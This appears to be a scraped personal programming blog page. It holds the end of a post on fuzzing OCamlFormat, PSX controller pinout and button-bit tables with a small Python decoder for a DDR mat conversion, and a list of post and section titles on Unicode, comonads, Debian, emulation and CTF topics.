Most of them are related to attributes that OCamlFormat did not try to include in the output, or where it forgot to add parentheses. Fortunately, there are safeguards in OCamlFormat: since it checks that the formatting preserves the AST structure, it will exit with an error instead of outputting a different program.

Once again, fuzzing has proved itself to be a powerful technique for finding actual bugs (including high-level ones). A possible approach for a next iteration is to try to detect more problems during formatting, such as finding cases where lines are longer than allowed. It is also possible to extend the random program generator so that it tries to generate comments, and let OCamlFormat check that they are all laid out correctly in the output. We look forward to employing fuzzing more extensively for OCamlFormat development in the future.

Color	DB25 #	PSX #	Function
orange	2	8	Command
yellow	3	4	Select
blue	4	3	Clock
pink	5-9 ¹	5	Vcc
brown	11	9	Data
black	19-25	6	Ground
green	NC

AVR port	Color	Function	Direction
Vcc	pink	Vcc	Power
GND	black	Ground	Power
PC0	brown	Data	D→H
PC1	orange	Command	H→D
PC2	yellow	Select	H→D
PC3	blue	Clock	H→D

Bit #	Key	Bit #	Key
0	Select	8	L2
1	(always 1)	9	R2
2	(always 1)	10	L1
3	Start	11	R1
4	Up	12	Triangle
5	Right	13	Circle
6	Down	14	Cross
7	Left	15	Square
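The bit table above can be read as a 16-bit word with one bit per key. Here is a minimal Python decoder. It assumes, as is usual for PSX pads but not stated in the table, that a key reads as 0 when pressed; the "always 1" bits 1 and 2 fit that convention. KEYS and pressed_keys are illustrative names.

```python
# Key names indexed by bit number, from the table above (None = always 1).
KEYS = [
    "Select", None, None, "Start", "Up", "Right", "Down", "Left",
    "L2", "R2", "L1", "R1", "Triangle", "Circle", "Cross", "Square",
]


def pressed_keys(state):
    """Decode a 16-bit button word, assuming a 0 bit means 'pressed'."""
    return [
        name
        for bit, name in enumerate(KEYS)
        if name is not None and not (state >> bit) & 1
    ]


print(pressed_keys(0xFFFF))                          # []
print(pressed_keys(0xFFFF & ~(1 << 4) & ~(1 << 14)))  # ['Up', 'Cross']
```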

Enter the void *

Hello, world !

Hakyll 101

Unicode : Math, greek, symbols - you name it !

EBCDIC, ASCII & the power of legacy

Unicode

Configure a compose key

Define a .XCompose mapping

What's in an ADT ?

Introduction

Principles

Syntax & semantics

It’s functions all the way down

Implementation

Conclusion

ZSH suffix aliases

Stripe CTF 2.0 (partial) writeup

Level 0 : the Secret Safe

Level 1 : the Guessing Game

Level 2 : the Social Network

Level 3 : the Secret Vault

Level 4 : the Karma Trader

Level 5 : the DomainAuthenticator

Other levels

Comonadic Life

Of monads and comonads

List Zippers

Plane zippers

Conway’s (comonadic) Game of Life

Resizing a LVM partition

Making type inference explode

Bring your own switch

My part of work in Debian Jessie

New packages in Debian

New packages I’m taking care of

Updates on my packages

Package given for adoption

Incomplete work

Debian Maintainer

Converting a Dance Dance Revolution mat to USB

Finding the pinout

Connecting it to the teensy++

Programming the teensy++

The PSX protocol

Interfacing with the computer

Making rollover work

On the curl | sh pattern

“If the URL starts with HTTPS, it is secure”

“apt-get install $pkg does the same thing”

Santa made me learn Rails in a week

A lens-based ST20 emulator

The evaluation monad

Memory

Instruction decoding

The two stacks

Input and output

A few combinators

The interpret function

Boot from link

Multithreading boilerplate

Connecting the lines

Bonus: static analysis tools

In Python, default values are evaluated at import time

NaBoMaMo 2016 writeup

Fuzzing OCamlFormat with AFL and Crowbar

The `interpret` function